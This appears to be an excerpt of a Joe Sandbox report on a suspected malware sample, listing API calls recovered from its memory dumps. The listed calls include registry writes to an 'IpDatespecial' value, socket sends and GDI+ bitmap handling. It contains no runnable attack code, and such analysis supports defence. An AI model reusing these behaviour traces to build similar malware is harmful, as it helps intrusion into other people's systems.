                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03646318,00000008,03633E36,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C), ref: 03633D3F
                                                                                                                            • __lock.LIBCMT ref: 03633D73
                                                                                                                              • Part of subcall function 03638E5B: __mtinitlocknum.LIBCMT ref: 03638E71
                                                                                                                              • Part of subcall function 03638E5B: __amsg_exit.LIBCMT ref: 03638E7D
                                                                                                                              • Part of subcall function 03638E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03633F06,0000000D,03646340,00000008,03633FFF,00000000,?,036310F0,00000000,03646278,00000008,03631155,?), ref: 03638E85
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 03633D80
                                                                                                                            • __lock.LIBCMT ref: 03633D94
                                                                                                                            • ___addlocaleref.LIBCMT ref: 03633DB2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0362B7A7
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0362B7B7
                                                                                                                            • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0362B7CE
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0362B7D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseDeleteOpen
                                                                                                                            • String ID: Console$IpDatespecial
                                                                                                                            • API String ID: 3183427449-1840232981
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C43412
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C43423
                                                                                                                            • __getptd.LIBCMT ref: 02C43431
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0364031D
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 0364032E
                                                                                                                            • __getptd.LIBCMT ref: 0364033C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 03629C3F
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 03629C63
                                                                                                                            • _memset.LIBCMT ref: 03629CBB
                                                                                                                              • Part of subcall function 0362A610: GetObjectW.GDI32(?,00000054,?), ref: 0362A62E
                                                                                                                            • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03629CD3
                                                                                                                            • _free.LIBCMT ref: 03629CE4
                                                                                                                            • _free.LIBCMT ref: 03629D23
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1756752955-0
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 02C350AA
                                                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 02C350C2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C350CC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: 768ded3e01b0f19f937499c9e44ef2cfb33578fb526ead1bbfb432bc07f8ce91
                                                                                                                            • Instruction ID: 6723d56eeecc66007c41840d8557bfd524b5609a5689a13d592a72990cf66031
                                                                                                                            • Opcode Fuzzy Hash: 768ded3e01b0f19f937499c9e44ef2cfb33578fb526ead1bbfb432bc07f8ce91
                                                                                                                            • Instruction Fuzzy Hash: 3B31CB7AA04644ABD721CFA4ED85B6BB3E9FB48750F404A1AFD06C7680D736A810CB90
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 036250CA
                                                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 036250E2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 036250EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: a74de6e74f6ffbb007594da9eb71fb7b2fb4df6890637a3ca2ae5332c2b7816e
                                                                                                                            • Instruction ID: 53cde7ae613f3d5d95dd2deee779a7d65d21484aaf9f16a798dee1969d017690
                                                                                                                            • Opcode Fuzzy Hash: a74de6e74f6ffbb007594da9eb71fb7b2fb4df6890637a3ca2ae5332c2b7816e
                                                                                                                            • Instruction Fuzzy Hash: 9831AE7AA04B08ABD720DF95D945B6BBBE8FB49710F10495EF916C7780E736A800CB54
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348EC
                                                                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C348F9
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C34914
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C3491D
                                                                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C3492E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 640476663-0
                                                                                                                            • Opcode ID: 06853faa616a761b6414d5b5694ce31fbb8eb477af54c74793bad7c08a49a785
                                                                                                                            • Instruction ID: 2406aa996f9a146fbdf7297624858b0be1754323c133a31fc8fc96b9baad4110
                                                                                                                            • Opcode Fuzzy Hash: 06853faa616a761b6414d5b5694ce31fbb8eb477af54c74793bad7c08a49a785
                                                                                                                            • Instruction Fuzzy Hash: A12148761042849BC715EBA8DC48A87F3F9FF993547544F08E554C7285C634A805CFE0
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 02C436CB
                                                                                                                              • Part of subcall function 02C4325B: __getptd.LIBCMT ref: 02C43269
                                                                                                                              • Part of subcall function 02C4325B: __getptd.LIBCMT ref: 02C43277
                                                                                                                            • __getptd.LIBCMT ref: 02C436D5
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C436E3
                                                                                                                            • __getptd.LIBCMT ref: 02C436F1
                                                                                                                            • __getptd.LIBCMT ref: 02C436FC
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 02C43722
                                                                                                                              • Part of subcall function 02C43300: __CallSettingFrame@12.LIBCMT ref: 02C4334C
                                                                                                                              • Part of subcall function 02C437C9: __getptd.LIBCMT ref: 02C437D8
                                                                                                                              • Part of subcall function 02C437C9: __getptd.LIBCMT ref: 02C437E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 081196c110454321d6a219b30e4b85e320d4327fa3d5f056476df268cc808128
                                                                                                                            • Instruction ID: 985573c747d494be6e302802866f7fb8bc8b8b95a6747894ac8c361be7614d7f
                                                                                                                            • Opcode Fuzzy Hash: 081196c110454321d6a219b30e4b85e320d4327fa3d5f056476df268cc808128
                                                                                                                            • Instruction Fuzzy Hash: AD1107B1C00309DFDB01EFA4D545AEE7BB2FF44314F1084A9E868A7250DB799A11EF50
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 036405D6
                                                                                                                              • Part of subcall function 036400B7: __getptd.LIBCMT ref: 036400C5
                                                                                                                              • Part of subcall function 036400B7: __getptd.LIBCMT ref: 036400D3
                                                                                                                            • __getptd.LIBCMT ref: 036405E0
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 036405EE
                                                                                                                            • __getptd.LIBCMT ref: 036405FC
                                                                                                                            • __getptd.LIBCMT ref: 03640607
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0364062D
                                                                                                                              • Part of subcall function 0364015C: __CallSettingFrame@12.LIBCMT ref: 036401A8
                                                                                                                              • Part of subcall function 036406D4: __getptd.LIBCMT ref: 036406E3
                                                                                                                              • Part of subcall function 036406D4: __getptd.LIBCMT ref: 036406F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: c50c07f3756157263ae9b8965d9d1ddf57879161269cecd2bdc0dede5d49b778
                                                                                                                            • Instruction ID: eed8a9c713264f18cefbaca59bce6df878044c93c64a545efa8a37d4ab44629c
                                                                                                                            • Opcode Fuzzy Hash: c50c07f3756157263ae9b8965d9d1ddf57879161269cecd2bdc0dede5d49b778
                                                                                                                            • Instruction Fuzzy Hash: 4111C6B9D01309DFDB10EFA4D484AEDBBB0FF05310F10806AE925AB250DB789A159F54
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 034BFF95
                                                                                                                              • Part of subcall function 034BFA76: __getptd.LIBCMT ref: 034BFA84
                                                                                                                              • Part of subcall function 034BFA76: __getptd.LIBCMT ref: 034BFA92
                                                                                                                            • __getptd.LIBCMT ref: 034BFF9F
                                                                                                                              • Part of subcall function 034B381A: __getptd_noexit.LIBCMT ref: 034B381D
                                                                                                                              • Part of subcall function 034B381A: __amsg_exit.LIBCMT ref: 034B382A
                                                                                                                            • __getptd.LIBCMT ref: 034BFFAD
                                                                                                                            • __getptd.LIBCMT ref: 034BFFBB
                                                                                                                            • __getptd.LIBCMT ref: 034BFFC6
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 034BFFEC
                                                                                                                              • Part of subcall function 034BFB1B: __CallSettingFrame@12.LIBCMT ref: 034BFB67
                                                                                                                              • Part of subcall function 034C0093: __getptd.LIBCMT ref: 034C00A2
                                                                                                                              • Part of subcall function 034C0093: __getptd.LIBCMT ref: 034C00B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                            • Instruction ID: 223ade8636231cd6fb6b0b1942cd0d4cf463b121821c2ddf02d166496dbe2bb4
                                                                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                            • Instruction Fuzzy Hash: 97119479D00309DFDB00EFA6D844AED7BB1FF08314F10846AE814AF250DB399A559F69
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C3D9CA
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __amsg_exit.LIBCMT ref: 02C3D9EA
                                                                                                                            • __lock.LIBCMT ref: 02C3D9FA
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C3DA17
                                                                                                                            • _free.LIBCMT ref: 02C3DA2A
                                                                                                                            • InterlockedIncrement.KERNEL32(02CC1658), ref: 02C3DA42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 642d09fec64462814870dae6058c4ff2984fc05aef899bef19cd659c0f1ba410
                                                                                                                            • Instruction ID: 0f920bd026f9f6958351fa9296e2b6e6a4d1eedb1204f6db304912bde1f37bf1
                                                                                                                            • Opcode Fuzzy Hash: 642d09fec64462814870dae6058c4ff2984fc05aef899bef19cd659c0f1ba410
                                                                                                                            • Instruction Fuzzy Hash: 7A01F576D857219BC723AF64900579FB7A2BF40711F040E05E85267280CF34B661EFD6
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 03634891
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __amsg_exit.LIBCMT ref: 036348B1
                                                                                                                            • __lock.LIBCMT ref: 036348C1
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 036348DE
                                                                                                                            • _free.LIBCMT ref: 036348F1
                                                                                                                            • InterlockedIncrement.KERNEL32(03901658), ref: 03634909
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 7e76c0441e0359fcf5e04af8da2207a90bfd010fb1154cd4ecca9da7cd5ee078
                                                                                                                            • Instruction ID: 10a2dff530d492b7c8c617f2064d7830cd736d4f283c60d68cb454594a2de3ec
                                                                                                                            • Opcode Fuzzy Hash: 7e76c0441e0359fcf5e04af8da2207a90bfd010fb1154cd4ecca9da7cd5ee078
                                                                                                                            • Instruction Fuzzy Hash: 7E015E39D427519BE722EB66A50479AF7A0EF06B20F180109E814AB784CF349541CB9A
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348EC
                                                                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C348F9
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C34914
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C3491D
                                                                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C3492E
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1019945655-0
                                                                                                                            • Opcode ID: 777a610e9a7af1c1f0c80598e45b04d6b8454e918fb1d20011e22722b6fb06ff
                                                                                                                            • Instruction ID: 6269f2717e117b52e6538ebe2ff168ffbd47311edcb71509ae5242a605a72817
                                                                                                                            • Opcode Fuzzy Hash: 777a610e9a7af1c1f0c80598e45b04d6b8454e918fb1d20011e22722b6fb06ff
                                                                                                                            • Instruction Fuzzy Hash: E4F096362046045BC224EBA9DC84E4BF3E9EFD9760B104F09E26987690CB75F801CBE0
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 03629BD2
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BE3
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BF8
                                                                                                                            • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03629B7B), ref: 03629C04
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C15
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4268643673-0
                                                                                                                            • Opcode ID: d5aa0e3abee292bc9b48ad796cec553d065971137ffcdd7f299b7e22d4a32df6
                                                                                                                            • Instruction ID: 01c8560fdda29cb956d9c54829363c109e18d3b3aa2a00d3e3725c855d6c5131
                                                                                                                            • Opcode Fuzzy Hash: d5aa0e3abee292bc9b48ad796cec553d065971137ffcdd7f299b7e22d4a32df6
                                                                                                                            • Instruction Fuzzy Hash: 66010CB5E00714DFCB04EFAA9990416BBF4BA8A715335A5AEF1188A20AC372C403CF95
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 036248E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 036248EC
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 036248F9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03624914
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362491D
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 0362492E
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1019945655-0
                                                                                                                            • Opcode ID: c323fdfa23d9c07a91e18cb5d248105b0a2b7f610779fe5a534d5c1d18244fb6
